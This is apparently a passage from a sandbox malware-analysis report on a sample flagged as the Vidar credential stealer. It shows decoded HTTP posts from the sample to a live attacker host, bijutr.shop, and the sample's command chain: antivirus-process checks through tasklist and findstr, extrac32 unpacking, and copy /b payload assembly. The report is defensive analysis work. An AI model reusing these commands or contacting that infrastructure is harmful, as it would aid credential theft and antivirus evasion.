                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:48 UTC199OUTData Raw: 74 35 58 68 6d 69 63 50 48 4a 47 78 56 6b 59 48 49 49 49 35 42 42 37 31 30 74 6a 34 38 31 58 4c 77 61 2f 4c 50 34 67 30 36 51 44 66 5a 36 68 63 75 34 44 44 37 72 49 78 4a 4b 4d 44 33 48 55 45 67 39 61 35 61 69 69 77 48 51 61 68 34 33 38 53 36 6a 35 38 63 6d 74 58 73 56 72 4d 70 6a 4e 6e 62 7a 76 48 62 72 47 52 6a 79 31 6a 42 32 68 63 63 59 78 30 72 6e 36 4b 4b 59 42 56 79 54 2f 41 4a 41 74 72 2f 31 38 54 66 38 41 6f 4d 64 55 36 75 53 66 38 67 57 31 2f 77 43 76 69 62 2f 30 47 4f 67 44 2f 39 6b 3d 0d 0a 2d 2d 2d 2d 2d 2d 54 4a 35 58 34 45 55 53 52 31 4e 59 4d 59 35 46 43 32 56 53 2d 2d 0d 0a
                                                                                                                                                                                                                                                                                                        Data Ascii: t5XhmicPHJGxVkYHIII5BB710tj481XLwa/LP4g06QDfZ6hcu4DD7rIxJKMD3HUEg9a5aiiwHQah438S6j58cmtXsVrMpjNnbzvHbrGRjy1jB2hccYx0rn6KKYBVyT/AJAtr/18Tf8AoMdU6uSf8gW1/wCvib/0GOgD/9k=------TJ5X4EUSR1NYMY5FC2VS--
                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:50 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                        Date: Tue, 24 Dec 2024 18:28:50 GMT
                                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:50 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                        Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                        50192.168.2.650107188.245.216.2054431396C:\Users\user\AppData\Local\Temp\680662\Billion.com
                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:51 UTC323OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=----8YMYM7YUK6FUAIWTJEUK
                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                                        Host: bijutr.shop
                                                                                                                                                                                                                                                                                                        Content-Length: 331
                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:51 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 38 59 4d 59 4d 37 59 55 4b 36 46 55 41 49 57 54 4a 45 55 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 35 39 36 35 34 63 33 62 63 63 37 33 33 30 65 31 39 35 34 63 61 66 64 33 34 35 34 65 63 34 34 0d 0a 2d 2d 2d 2d 2d 2d 38 59 4d 59 4d 37 59 55 4b 36 46 55 41 49 57 54 4a 45 55 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 31 34 30 30 66 31 31 35 31 33 31 65 31 66 61 38 34 65 61 39 38 35 39 39 64 35 33 64 30 62 64 0d 0a 2d 2d 2d 2d 2d 2d 38 59 4d 59 4d 37 59 55 4b 36 46 55 41 49 57 54 4a 45 55 4b 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                                        Data Ascii: ------8YMYM7YUK6FUAIWTJEUKContent-Disposition: form-data; name="token"259654c3bcc7330e1954cafd3454ec44------8YMYM7YUK6FUAIWTJEUKContent-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------8YMYM7YUK6FUAIWTJEUKCont
                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:52 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                        Date: Tue, 24 Dec 2024 18:28:52 GMT
                                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:52 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                        51192.168.2.65011020.198.119.84443
                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:53 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 59 2f 4e 76 71 70 36 34 67 30 32 79 76 70 74 72 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 34 65 64 62 63 62 65 62 62 66 34 36 35 33 36 35 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                        Data Ascii: CNT 1 CON 305MS-CV: Y/Nvqp64g02yvptr.1Context: 4edbcbebbf465365
                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:53 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                                                                                                                                                                                                                                                                        Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:53 UTC1084OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 59 2f 4e 76 71 70 36 34 67 30 32 79 76 70 74 72 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 34 65 64 62 63 62 65 62 62 66 34 36 35 33 36 35 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 66 33 63 4c 59 5a 74 57 55 43 4a 71 41 63 32 53 58 55 68 66 70 6a 5a 33 66 36 65 53 46 4b 64 6c 6d 68 64 33 31 75 6d 37 2f 73 33 47 51 59 34 79 33 62 4a 6a 34 71 7a 42 72 39 34 6e 69 75 51 39 4b 4b 61 52 44 4a 61 76 78 76 6e 37 75 51 65 36 43 72 53 74 31 76 46 51 6d 4d 42 6d 59 48 62 47 68 56 38 4b 71 4a 35 5a 64 4d 79 72 70
                                                                                                                                                                                                                                                                                                        Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: Y/Nvqp64g02yvptr.2Context: 4edbcbebbf465365<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAf3cLYZtWUCJqAc2SXUhfpjZ3f6eSFKdlmhd31um7/s3GQY4y3bJj4qzBr94niuQ9KKaRDJavxvn7uQe6CrSt1vFQmMBmYHbGhV8KqJ5ZdMyrp
                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:53 UTC218OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 59 2f 4e 76 71 70 36 34 67 30 32 79 76 70 74 72 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 34 65 64 62 63 62 65 62 62 66 34 36 35 33 36 35 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                                                                                                                                                                                                                                                                                                        Data Ascii: BND 3 CON\WNS 0 197MS-CV: Y/Nvqp64g02yvptr.3Context: 4edbcbebbf465365<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:54 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                                                                                                                                                                                                                                                                        Data Ascii: 202 1 CON 58
                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:54 UTC58INData Raw: 4d 53 2d 43 56 3a 20 31 4c 6f 6d 4f 6b 36 51 2f 45 57 44 34 56 6e 53 42 4f 49 4c 52 51 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                                                                                                                                                                                                                                                                        Data Ascii: MS-CV: 1LomOk6Q/EWD4VnSBOILRQ.0Payload parsing failed.


                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                        52192.168.2.650117188.245.216.2054431396C:\Users\user\AppData\Local\Temp\680662\Billion.com
                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:54 UTC323OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=----MY58GDTJM7GVAAAIE3WB
                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                                        Host: bijutr.shop
                                                                                                                                                                                                                                                                                                        Content-Length: 331
                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:54 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 4d 59 35 38 47 44 54 4a 4d 37 47 56 41 41 41 49 45 33 57 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 35 39 36 35 34 63 33 62 63 63 37 33 33 30 65 31 39 35 34 63 61 66 64 33 34 35 34 65 63 34 34 0d 0a 2d 2d 2d 2d 2d 2d 4d 59 35 38 47 44 54 4a 4d 37 47 56 41 41 41 49 45 33 57 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 31 34 30 30 66 31 31 35 31 33 31 65 31 66 61 38 34 65 61 39 38 35 39 39 64 35 33 64 30 62 64 0d 0a 2d 2d 2d 2d 2d 2d 4d 59 35 38 47 44 54 4a 4d 37 47 56 41 41 41 49 45 33 57 42 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                                        Data Ascii: ------MY58GDTJM7GVAAAIE3WBContent-Disposition: form-data; name="token"259654c3bcc7330e1954cafd3454ec44------MY58GDTJM7GVAAAIE3WBContent-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------MY58GDTJM7GVAAAIE3WBCont
                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:55 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                        Date: Tue, 24 Dec 2024 18:28:54 GMT
                                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:55 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                        Statistics

                                                                                                                                                                                                                                                                                                        CPU Usage

                                                                                                                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                                                                                                                        Memory Usage

                                                                                                                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                                                                                                                        High Level Behavior Distribution

                                                                                                                                                                                                                                                                                                        Click to dive into process behavior distribution

                                                                                                                                                                                                                                                                                                        Behavior

                                                                                                                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                                                                                                                        System Behavior

                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                        Target ID:0
                                                                                                                                                                                                                                                                                                        Start time:13:26:53
                                                                                                                                                                                                                                                                                                        Start date:24/12/2024
                                                                                                                                                                                                                                                                                                        Path:C:\Users\user\Desktop\PodcastsTries.exe
                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                        Commandline:"C:\Users\user\Desktop\PodcastsTries.exe"
                                                                                                                                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                                                                                                                                        File size:1'259'108 bytes
                                                                                                                                                                                                                                                                                                        MD5 hash:20BEF33E4A0ADD922AE043E2AED13EA2
                                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                        Target ID:2
                                                                                                                                                                                                                                                                                                        Start time:13:26:54
                                                                                                                                                                                                                                                                                                        Start date:24/12/2024
                                                                                                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                        Commandline:"C:\Windows\System32\cmd.exe" /c move Assessing Assessing.cmd & Assessing.cmd
                                                                                                                                                                                                                                                                                                        Imagebase:0x1c0000
                                                                                                                                                                                                                                                                                                        File size:236'544 bytes
                                                                                                                                                                                                                                                                                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                        Target ID:3
                                                                                                                                                                                                                                                                                                        Start time:13:26:54
                                                                                                                                                                                                                                                                                                        Start date:24/12/2024
                                                                                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                        Imagebase:0x7ff66e660000
                                                                                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                        Target ID:4
                                                                                                                                                                                                                                                                                                        Start time:13:26:54
                                                                                                                                                                                                                                                                                                        Start date:24/12/2024
                                                                                                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\tasklist.exe
                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                        Commandline:tasklist
                                                                                                                                                                                                                                                                                                        Imagebase:0xda0000
                                                                                                                                                                                                                                                                                                        File size:79'360 bytes
                                                                                                                                                                                                                                                                                                        MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                        Target ID:5
                                                                                                                                                                                                                                                                                                        Start time:13:26:54
                                                                                                                                                                                                                                                                                                        Start date:24/12/2024
                                                                                                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                        Commandline:findstr /I "opssvc wrsa"
                                                                                                                                                                                                                                                                                                        Imagebase:0x2b0000
                                                                                                                                                                                                                                                                                                        File size:29'696 bytes
                                                                                                                                                                                                                                                                                                        MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                        Target ID:6
                                                                                                                                                                                                                                                                                                        Start time:13:26:55
                                                                                                                                                                                                                                                                                                        Start date:24/12/2024
                                                                                                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\tasklist.exe
                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                        Commandline:tasklist
                                                                                                                                                                                                                                                                                                        Imagebase:0xda0000
                                                                                                                                                                                                                                                                                                        File size:79'360 bytes
                                                                                                                                                                                                                                                                                                        MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                        Target ID:7
                                                                                                                                                                                                                                                                                                        Start time:13:26:55
                                                                                                                                                                                                                                                                                                        Start date:24/12/2024
                                                                                                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                        Commandline:findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
                                                                                                                                                                                                                                                                                                        Imagebase:0x2b0000
                                                                                                                                                                                                                                                                                                        File size:29'696 bytes
                                                                                                                                                                                                                                                                                                        MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                        Target ID:8
                                                                                                                                                                                                                                                                                                        Start time:13:26:56
                                                                                                                                                                                                                                                                                                        Start date:24/12/2024
                                                                                                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                        Commandline:cmd /c md 680662
                                                                                                                                                                                                                                                                                                        Imagebase:0x1c0000
                                                                                                                                                                                                                                                                                                        File size:236'544 bytes
                                                                                                                                                                                                                                                                                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                        Target ID:9
                                                                                                                                                                                                                                                                                                        Start time:13:26:56
                                                                                                                                                                                                                                                                                                        Start date:24/12/2024
                                                                                                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                        Commandline:extrac32 /Y /E Memo
                                                                                                                                                                                                                                                                                                        Imagebase:0x910000
                                                                                                                                                                                                                                                                                                        File size:29'184 bytes
                                                                                                                                                                                                                                                                                                        MD5 hash:9472AAB6390E4F1431BAA912FCFF9707
                                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                        Reputation:moderate
                                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                        Target ID:10
                                                                                                                                                                                                                                                                                                        Start time:13:26:56
                                                                                                                                                                                                                                                                                                        Start date:24/12/2024
                                                                                                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                        Commandline:findstr /V "OBTAINING" Compensation
                                                                                                                                                                                                                                                                                                        Imagebase:0x2b0000
                                                                                                                                                                                                                                                                                                        File size:29'696 bytes
                                                                                                                                                                                                                                                                                                        MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                        Target ID:11
                                                                                                                                                                                                                                                                                                        Start time:13:26:56
                                                                                                                                                                                                                                                                                                        Start date:24/12/2024
                                                                                                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                        Commandline:cmd /c copy /b ..\Honey + ..\Biotechnology + ..\Enzyme + ..\Harvard T
                                                                                                                                                                                                                                                                                                        Imagebase:0x1c0000
                                                                                                                                                                                                                                                                                                        File size:236'544 bytes
                                                                                                                                                                                                                                                                                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                        Target ID:12
                                                                                                                                                                                                                                                                                                        Start time:13:26:57
                                                                                                                                                                                                                                                                                                        Start date:24/12/2024
                                                                                                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\680662\Billion.com
                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                        Commandline:Billion.com T
                                                                                                                                                                                                                                                                                                        Imagebase:0x130000
                                                                                                                                                                                                                                                                                                        File size:947'288 bytes
                                                                                                                                                                                                                                                                                                        MD5 hash:62D09F076E6E0240548C2F837536A46A
                                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000C.00000002.3329936932.0000000004391000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000C.00000002.3329936932.0000000004391000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000C.00000003.2541281715.0000000000FCB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000C.00000003.2540896451.0000000000F91000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000C.00000003.2540939282.0000000000F1F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000C.00000002.3327789976.0000000004110000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000C.00000002.3329936932.000000000446D000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000C.00000003.2541052285.0000000004391000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000C.00000002.3327625585.0000000004090000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000C.00000002.3327625585.0000000004090000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000C.00000002.3326463584.0000000000EF2000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000C.00000002.3326463584.0000000000EF2000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                        Antivirus matches:
                                                                                                                                                                                                                                                                                                        • Detection: 0%, ReversingLabs
                                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                        Target ID:13
                                                                                                                                                                                                                                                                                                        Start time:13:26:57
                                                                                                                                                                                                                                                                                                        Start date:24/12/2024
